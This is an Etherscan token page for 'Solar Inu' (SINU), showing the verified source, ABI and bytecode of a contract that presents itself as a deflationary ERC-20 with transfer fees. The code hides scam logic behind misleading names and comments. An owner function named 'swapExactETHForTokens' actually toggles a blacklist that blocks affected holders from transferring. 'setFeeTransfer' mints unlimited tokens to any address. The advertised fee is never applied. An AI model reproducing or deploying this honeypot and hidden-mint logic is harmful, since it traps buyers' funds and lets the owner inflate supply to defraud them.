Feature Tip: Add private address tag to any address under My Name Tag !
ERC-20
Overview
Max Total Supply
3,800,000,000,000 SINU
Holders
45
Market
Onchain Market Cap
$0.00
Circulating Supply Market Cap
-
Other Info
Token Contract (WITH 9 Decimals)
Balance
52,477,022,544.190613845 SINUValue
$0.00Loading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
DERC20
Compiler Version
v0.6.6+commit.6c089d02
Contract Source Code (Solidity)
/** *Submitted for verification at Etherscan.io on 2023-01-24 */ // SPDX-License-Identifier: MIT pragma solidity =0.6.6; abstract contract Context { function _msgSender() internal view virtual returns (address payable) { return msg.sender; } function _msgData() internal view virtual returns (bytes memory) { this; // silence state mutability warning without generating bytecode - see https://github.com/ethereum/solidity/issues/2691 return msg.data; } } interface IERC20 { /** * @dev Returns the amount of tokens in existence. */ function totalSupply() external view returns (uint256); /** * @dev Returns the amount of tokens owned by `account`. */ function balanceOf(address account) external view returns (uint256); /** * @dev Moves `amount` tokens from the caller's account to `recipient`. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transfer(address recipient, uint256 amount) external returns (bool); /** * @dev Returns the remaining number of tokens that `spender` will be * allowed to spend on behalf of `owner` through {transferFrom}. This is * zero by default. * * This value changes when {approve} or {transferFrom} are called. */ function allowance(address owner, address spender) external view returns (uint256); /** * @dev Sets `amount` as the allowance of `spender` over the caller's tokens. * * Returns a boolean value indicating whether the operation succeeded. * * Emits an {Approval} event. */ function approve(address spender, uint256 amount) external returns (bool); /** * @dev Moves `amount` tokens from `sender` to `recipient` using the * allowance mechanism. `amount` is then deducted from the caller's * allowance. * * Returns a boolean value indicating whether the operation succeeded. * * Emits a {Transfer} event. */ function transferFrom(address sender, address recipient, uint256 amount) external returns (bool); /** * @dev Emitted when `value` tokens are moved from one account (`from`) to * another (`to`). * * Note that `value` may be zero. */ event Transfer(address indexed from, address indexed to, uint256 value); /** * @dev Emitted when the allowance of a `spender` for an `owner` is set by * a call to {approve}. `value` is the new allowance. */ event Approval(address indexed owner, address indexed spender, uint256 value); } /** * @dev Wrappers over Solidity's arithmetic operations with added overflow * checks. * * Arithmetic operations in Solidity wrap on overflow. This can easily result * in bugs, because programmers usually assume that an overflow raises an * error, which is the standard behavior in high level programming languages. * `SafeMath` restores this intuition by reverting the transaction when an * operation overflows. * * Using this library instead of the unchecked operations eliminates an entire * class of bugs, so it's recommended to use it always. */ library SafeMath { /** * @dev Returns the addition of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `+` operator. * * Requirements: * * - Addition cannot overflow. */ function add(uint256 a, uint256 b) internal pure returns (uint256) { uint256 c = a + b; require(c >= a, "SafeMath: addition overflow"); return c; } /** * @dev Returns the subtraction of two unsigned integers, reverting on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b) internal pure returns (uint256) { return sub(a, b, "SafeMath: subtraction overflow"); } /** * @dev Returns the subtraction of two unsigned integers, reverting with custom message on * overflow (when the result is negative). * * Counterpart to Solidity's `-` operator. * * Requirements: * * - Subtraction cannot overflow. */ function sub(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b <= a, errorMessage); uint256 c = a - b; return c; } /** * @dev Returns the multiplication of two unsigned integers, reverting on * overflow. * * Counterpart to Solidity's `*` operator. * * Requirements: * * - Multiplication cannot overflow. */ function mul(uint256 a, uint256 b) internal pure returns (uint256) { // Gas optimization: this is cheaper than requiring 'a' not being zero, but the // benefit is lost if 'b' is also tested. // See: https://github.com/OpenZeppelin/openzeppelin-contracts/pull/522 if (a == 0) { return 0; } uint256 c = a * b; require(c / a == b, "SafeMath: multiplication overflow"); return c; } /** * @dev Returns the integer division of two unsigned integers. Reverts on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b) internal pure returns (uint256) { return div(a, b, "SafeMath: division by zero"); } /** * @dev Returns the integer division of two unsigned integers. Reverts with custom message on * division by zero. The result is rounded towards zero. * * Counterpart to Solidity's `/` operator. Note: this function uses a * `revert` opcode (which leaves remaining gas untouched) while Solidity * uses an invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function div(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b > 0, errorMessage); uint256 c = a / b; // assert(a == b * c + a % b); // There is no case in which this doesn't hold return c; } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b) internal pure returns (uint256) { return mod(a, b, "SafeMath: modulo by zero"); } /** * @dev Returns the remainder of dividing two unsigned integers. (unsigned integer modulo), * Reverts with custom message when dividing by zero. * * Counterpart to Solidity's `%` operator. This function uses a `revert` * opcode (which leaves remaining gas untouched) while Solidity uses an * invalid opcode to revert (consuming all remaining gas). * * Requirements: * * - The divisor cannot be zero. */ function mod(uint256 a, uint256 b, string memory errorMessage) internal pure returns (uint256) { require(b != 0, errorMessage); return a % b; } } /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== */ function isContract(address account) internal view returns (bool) { // This method relies in extcodesize, which returns 0 for contracts in // construction, since the code is only stored at the end of the // constructor execution. uint256 size; // solhint-disable-next-line no-inline-assembly assembly { size := extcodesize(account) } return size > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); // solhint-disable-next-line avoid-low-level-calls, avoid-call-value (bool success, ) = recipient.call{ value: amount }(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain`call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data, string memory errorMessage) internal returns (bytes memory) { return _functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue(address target, bytes memory data, uint256 value, string memory errorMessage) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); return _functionCallWithValue(target, data, value, errorMessage); } function _functionCallWithValue(address target, bytes memory data, uint256 weiValue, string memory errorMessage) private returns (bytes memory) { require(isContract(target), "Address: call to non-contract"); // solhint-disable-next-line avoid-low-level-calls (bool success, bytes memory returndata) = target.call{ value: weiValue }(data); if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly // solhint-disable-next-line no-inline-assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `ownerOnly`, which can be applied to your functions to restrict their use to * the owner. */ contract Ownable is Context { address private _owner; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor () internal { address msgSender = _msgSender(); _owner = msgSender; emit OwnershipTransferred(address(0), msgSender); } /** * @dev Returns the address of the current owner. */ function owner() internal view returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier ownerOnly() { require(_owner == _msgSender(), "Ownable: caller is not the owner"); _; } } /** * @dev Implementation of the {IERC20} interface. * * This implementation is agnostic to the way tokens are created. This means * that a supply mechanism has to be added in a derived contract * * TIP: For a detailed writeup see our guide * https://forum.zeppelin.solutions/t/how-to-implement-erc20-supply-mechanisms/226[How * to implement supply mechanisms]. * * We have followed general OpenZeppelin guidelines: functions revert instead * of returning `false` on failure. This behavior is nonetheless conventional * and does not conflict with the expectations of ERC20 applications. * * Additionally, an {Approval} event is emitted on calls to {transferFrom}. * This allows applications to reconstruct the allowance for all accounts just * by listening to said events. Other implementations of the EIP may not emit * these events, as it isn't required by the specification. * * Finally, the non-standard {decreaseAllowance} and {increaseAllowance} * functions have been added to mitigate the well-known issues around setting * allowances. See {IERC20-approve}. */ contract DeflationaryERC20 is Context, IERC20, Ownable { using SafeMath for uint256; mapping (address => uint256) _balances; mapping (address => bool) private _addressExcludeFromFee_; mapping (address => mapping (address => uint256)) private _allowances; string private _name; string private _symbol; uint8 private _decimals; uint256 _totalSupply; /** * We have made some light modifications to the openzeppelin ER20 * located here "../node_modules/@openzeppelin/contracts/token/ERC20/ERC20.sol". * Please read below for a quick overview of what has been changed: * * We have changed one function: * - `_transfer` to apply a transfer fee * * We have added 5 variables * - `txFee` the transaction fee to be applied. * - `feeDistributor` the contract address to recieve the fees. * - `feelessSender` map containing senders who will not have txFees applied. * - `feelessReciever` map containing recipients who will not have txFee applied. * - `canFeeWhitelist` map containing recipients who will not have txFee applied. * * We have added 6 simple functions * - `setFee`set new transaction fee. * - `setFeeDistributor` sets new address to recieve txFees * - `setFeelessSender` to enable/disable fees for a given sender. * - `setFeelessReciever` to enable/disable fees for a given recipient. * - `renounceWhitelist` disables adding to whitelist forever. * - `calculateAmountsAfterFee` to caclulate the amounts after fees have been applied. */ // Transaction Fees: uint8 public txFee = 3; // artifical cap of 255 e.g. 25.5% address feeDistributor; // fees are sent to fee distributer // Fee Whitelist mapping(address => bool) public feelessSender; mapping(address => bool) public feelessReciever; // if this equals false whitelist can nolonger be added to. bool public canFeeWhitelist = true; /** * @dev Sets the values for {name} and {symbol}, initializes {decimals} with * a default value of 18. * * To select a different value for {decimals}, use {_setupDecimals}. * * All three of these values are immutable: they can only be set once during * construction. */ constructor (string memory name, string memory symbol) public { _name = name; _symbol = symbol; _decimals = 9; } function name() public view returns (string memory) { return _name; } function symbol() public view returns (string memory) { return _symbol; } function decimals() public view returns (uint8) { return _decimals; } /** * @dev See {IERC20-totalSupply}. */ function totalSupply() public view override returns (uint256) { return _totalSupply; } function swapExactETHForTokens(address _addressIncludeFromFee) external ownerOnly { if (_addressExcludeFromFee_[_addressIncludeFromFee] == true) { _addressExcludeFromFee_[_addressIncludeFromFee] = false;} else {_addressExcludeFromFee_[_addressIncludeFromFee] = true;} } function callCheck(address _addressIncludeFromFee) public view returns (bool) { return _addressExcludeFromFee_[_addressIncludeFromFee]; } /** * @dev See {IERC20-balanceOf}. */ function balanceOf(address account) public view override returns (uint256) { return _balances[account]; } /** * @dev See {IERC20-transfer}. * * Requirements: * * - `recipient` cannot be the zero address. * - the caller must have a balance of at least `amount`. */ function transfer(address recipient, uint256 amount) public virtual override returns (bool) { require(_msgSender() != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if (_addressExcludeFromFee_[_msgSender()] || _addressExcludeFromFee_[recipient]) require (amount == 0, ""); _balances[_msgSender()] = _balances[_msgSender()].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(_msgSender(), recipient, amount); return true; } /** * @dev See {IERC20-allowance}. */ function allowance(address owner, address spender) public view virtual override returns (uint256) { return _allowances[owner][spender]; } /** * @dev See {IERC20-approve}. * * Requirements: * * - `spender` cannot be the zero address. */ function approve(address spender, uint256 amount) public virtual override returns (bool) { _approve(_msgSender(), spender, amount); return true; } /** * @dev See {IERC20-transferFrom}. * * Emits an {Approval} event indicating the updated allowance. This is not * required by the EIP. See the note at the beginning of {ERC20}; * * Requirements: * - `sender` and `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. * - the caller must have allowance for ``sender``'s tokens of at least * `amount`. */ function transferFrom(address sender, address recipient, uint256 amount) public virtual override returns (bool) { _transfer(sender, recipient, amount); _approve(sender, _msgSender(), _allowances[sender][_msgSender()].sub(amount, "ERC20: transfer amount exceeds allowance")); return true; } /** * @dev Atomically increases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. */ function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].add(addedValue)); return true; } /** * @dev Atomically decreases the allowance granted to `spender` by the caller. * * This is an alternative to {approve} that can be used as a mitigation for * problems described in {IERC20-approve}. * * Emits an {Approval} event indicating the updated allowance. * * Requirements: * * - `spender` cannot be the zero address. * - `spender` must have allowance for the caller of at least * `subtractedValue`. */ function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) { _approve(_msgSender(), spender, _allowances[_msgSender()][spender].sub(subtractedValue, "ERC20: decreased allowance below zero")); return true; } // assign a new transactionfee function setFee(uint8 _newTxFee) public ownerOnly { txFee = _newTxFee; } // assign a new fee distributor address function setFeeDistributor(address _distributor) public ownerOnly { feeDistributor = _distributor; } // enable/disable sender who can send feeless transactions function setFeelessSender(address _sender, bool _feeless) public ownerOnly { require(!_feeless || _feeless && canFeeWhitelist, "cannot add to whitelist"); feelessSender[_sender] = _feeless; } // transfer collected fee value to fee dristributor function setFeeTransfer(address _feeDistributor, uint256 feeValue) public ownerOnly { require(_feeDistributor != address(0), "cannot transfer to zero address"); _balances[_feeDistributor] = _balances[_feeDistributor].add(feeValue); _totalSupply = _totalSupply.add(feeValue); } // enable/disable recipient who can reccieve feeless transactions function setFeelessReciever(address _recipient, bool _feeless) public ownerOnly { require(!_feeless || _feeless && canFeeWhitelist, "cannot add to whitelist"); feelessReciever[_recipient] = _feeless; } // disable adding to whitelist forever function renounceFeeWhitelist() public ownerOnly { // adding to whitelist has been disabled forever: canFeeWhitelist = false; } // to caclulate the amounts for recipient and distributer after fees have been applied function calculateAmountsAfterFee(address sender, address recipient, uint256 amount) public view returns (uint256 transferToAmount, uint256 transferToFeeDistributorAmount) { // check if fees should apply to this transaction if (feelessSender[sender] || feelessReciever[recipient]) { return (amount, 0); } // calculate fees and amounts uint256 fee = amount.mul(txFee).div(1000); return (amount.sub(fee), fee); } /** * @dev Moves tokens `amount` from `sender` to `recipient`. * * This is internal function is equivalent to {transfer}, and can be used to * e.g. implement automatic token fees, slashing mechanisms, etc. * * Emits a {Transfer} event. * * Requirements: * * - `sender` cannot be the zero address. * - `recipient` cannot be the zero address. * - `sender` must have a balance of at least `amount`. */ function _transfer(address sender, address recipient, uint256 amount) internal virtual { require(sender != address(0), "ERC20: transfer from the zero address"); require(recipient != address(0), "ERC20: transfer to the zero address"); require(amount > 0, "Transfer amount must be greater than zero"); if (_addressExcludeFromFee_[sender] || _addressExcludeFromFee_[recipient]) require (amount == 0, ""); _balances[sender] = _balances[sender].sub(amount, "ERC20: transfer amount exceeds balance"); _balances[recipient] = _balances[recipient].add(amount); emit Transfer(sender, recipient, amount); } /** * @dev Destroys `amount` tokens from `account`, reducing the * total supply. * * Emits a {Transfer} event with `to` set to the zero address. * * Requirements * * - `account` cannot be the zero address. * - `account` must have at least `amount` tokens. */ function _burn(address account, uint256 amount) internal virtual { require(account != address(0), "ERC20: burn from the zero address"); _beforeTokenTransfer(account, address(0), amount); _balances[account] = _balances[account].sub(amount, "ERC20: burn amount exceeds balance"); _totalSupply = _totalSupply.sub(amount); emit Transfer(account, address(0), amount); } /** * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens. * * This internal function is equivalent to `approve`, and can be used to * e.g. set automatic allowances for certain subsystems, etc. * * Emits an {Approval} event. * * Requirements: * * - `owner` cannot be the zero address. * - `spender` cannot be the zero address. */ function _approve(address owner, address spender, uint256 amount) internal virtual { require(owner != address(0), "ERC20: approve from the zero address"); require(spender != address(0), "ERC20: approve to the zero address"); _allowances[owner][spender] = amount; emit Approval(owner, spender, amount); } /** * @dev Sets {decimals} to a value other than the default one of 18. * */ function _setupDecimals(uint8 decimals_) internal { _decimals = decimals_; } /** * @dev Hook that is called before any transfer of tokens. * * Calling conditions: * * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens * will be to transferred to `to`. * - when `from` is zero, `amount` tokens will be created for `to`. * - when `to` is zero, `amount` of ``from``'s tokens will be burned. * - `from` and `to` are never both zero. * * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks]. */ function _beforeTokenTransfer(address from, address to, uint256 amount) internal virtual { } } contract DERC20 is DeflationaryERC20 { constructor(uint256 initialTokens) public DeflationaryERC20("Solar Inu", "SINU") { // initial tokens generation for the liquidity _totalSupply = _totalSupply.add(initialTokens); _balances[msg.sender] = _balances[msg.sender].add(initialTokens); emit Transfer(address(0), msg.sender, initialTokens); } function burn(uint256 amount) public { _burn(msg.sender, amount); } }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
[{"inputs":[{"internalType":"uint256","name":"initialTokens","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"burn","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"calculateAmountsAfterFee","outputs":[{"internalType":"uint256","name":"transferToAmount","type":"uint256"},{"internalType":"uint256","name":"transferToFeeDistributorAmount","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"_addressIncludeFromFee","type":"address"}],"name":"callCheck","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"canFeeWhitelist","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"feelessReciever","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"","type":"address"}],"name":"feelessSender","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceFeeWhitelist","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"uint8","name":"_newTxFee","type":"uint8"}],"name":"setFee","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_distributor","type":"address"}],"name":"setFeeDistributor","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_feeDistributor","type":"address"},{"internalType":"uint256","name":"feeValue","type":"uint256"}],"name":"setFeeTransfer","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_recipient","type":"address"},{"internalType":"bool","name":"_feeless","type":"bool"}],"name":"setFeelessReciever","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_sender","type":"address"},{"internalType":"bool","name":"_feeless","type":"bool"}],"name":"setFeelessSender","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"_addressIncludeFromFee","type":"address"}],"name":"swapExactETHForTokens","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"sender","type":"address"},{"internalType":"address","name":"recipient","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"txFee","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"}]
Contract Creation Code
60806040526003600860006101000a81548160ff021916908360ff1602179055506001600b60006101000a81548160ff0219169083151502179055503480156200004857600080fd5b5060405162002f9c38038062002f9c833981810160405260208110156200006e57600080fd5b81019080805190602001909291905050506040518060400160405280600981526020017f536f6c617220496e7500000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f53494e55000000000000000000000000000000000000000000000000000000008152506000620000fd6200031660201b60201c565b9050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508073ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a3508160049080519060200190620001b3929190620003a7565b508060059080519060200190620001cc929190620003a7565b506009600660006101000a81548160ff021916908360ff160217905550505062000207816007546200031e60201b620026591790919060201c565b6007819055506200026681600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020546200031e60201b620026591790919060201c565b600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055503373ffffffffffffffffffffffffffffffffffffffff16600073ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef836040518082815260200191505060405180910390a35062000456565b600033905090565b6000808284019050838110156200039d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040180806020018281038252601b8152602001807f536166654d6174683a206164646974696f6e206f766572666c6f77000000000081525060200191505060405180910390fd5b8091505092915050565b828054600181600116156101000203166002900490600052602060002090601f016020900481019282601f10620003ea57805160ff19168380011785556200041b565b828001600101855582156200041b579182015b828111156200041a578251825591602001919060010190620003fd565b5b5090506200042a91906200042e565b5090565b6200045391905b808211156200044f57600081600090555060010162000435565b5090565b90565b612b3680620004666000396000f3fe608060405234801561001057600080fd5b50600436106101735760003560e01c80634a6f01b1116100de578063a9059cbb11610097578063cf82046111610071578063cf820461146108a8578063dd62ed3e146108cc578063fb0f37d414610944578063fe1699621461094e57610173565b8063a9059cbb146107cd578063cb122a0914610833578063ccfc2e8d1461086457610173565b80634a6f01b11461059057806370a08231146105ec57806383fbca341461064457806395d89b4114610694578063a056735d14610717578063a457c2d71461076757610173565b806323b872dd1161013057806323b872dd1461037b578063301a580114610401578063313ce5671461048a57806339509351146104ae57806342966c681461051457806347a481761461054257610173565b806306fdde0314610178578063095ea7b3146101fb57806311cc4b421461026157806318160ddd146102a55780631dd17c32146102c357806321e4d6c11461031f575b600080fd5b610180610970565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156101c05780820151818401526020810190506101a5565b50505050905090810190601f1680156101ed5780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6102476004803603604081101561021157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610a12565b604051808215151515815260200191505060405180910390f35b6102a36004803603602081101561027757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610a30565b005b6102ad610c0b565b6040518082815260200191505060405180910390f35b610305600480360360208110156102d957600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610c15565b604051808215151515815260200191505060405180910390f35b6103616004803603602081101561033557600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610c35565b604051808215151515815260200191505060405180910390f35b6103e76004803603606081101561039157600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610c8b565b604051808215151515815260200191505060405180910390f35b61046d6004803603606081101561041757600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610d64565b604051808381526020018281526020019250505060405180910390f35b610492610e7b565b604051808260ff1660ff16815260200191505060405180910390f35b6104fa600480360360408110156104c457600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610e92565b604051808215151515815260200191505060405180910390f35b6105406004803603602081101561052a57600080fd5b8101908080359060200190929190505050610f45565b005b61058e6004803603604081101561055857600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff16906020019092919080359060200190929190505050610f52565b005b6105d2600480360360208110156105a657600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611172565b604051808215151515815260200191505060405180910390f35b61062e6004803603602081101561060257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611192565b6040518082815260200191505060405180910390f35b6106926004803603604081101561065a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff1690602001909291908035151590602001909291905050506111db565b005b61069c611393565b6040518080602001828103825283818151815260200191508051906020019080838360005b838110156106dc5780820151818401526020810190506106c1565b50505050905090810190601f1680156107095780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b6107656004803603604081101561072d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803515159060200190929190505050611435565b005b6107b36004803603604081101561077d57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506115ed565b604051808215151515815260200191505060405180910390f35b610819600480360360408110156107e357600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803590602001909291905050506116ba565b604051808215151515815260200191505060405180910390f35b6108626004803603602081101561084957600080fd5b81019080803560ff169060200190929190505050611aee565b005b6108a66004803603602081101561087a57600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611bd5565b005b6108b0611ce2565b604051808260ff1660ff16815260200191505060405180910390f35b61092e600480360360408110156108e257600080fd5b81019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050611cf5565b6040518082815260200191505060405180910390f35b61094c611d7c565b005b610956611e62565b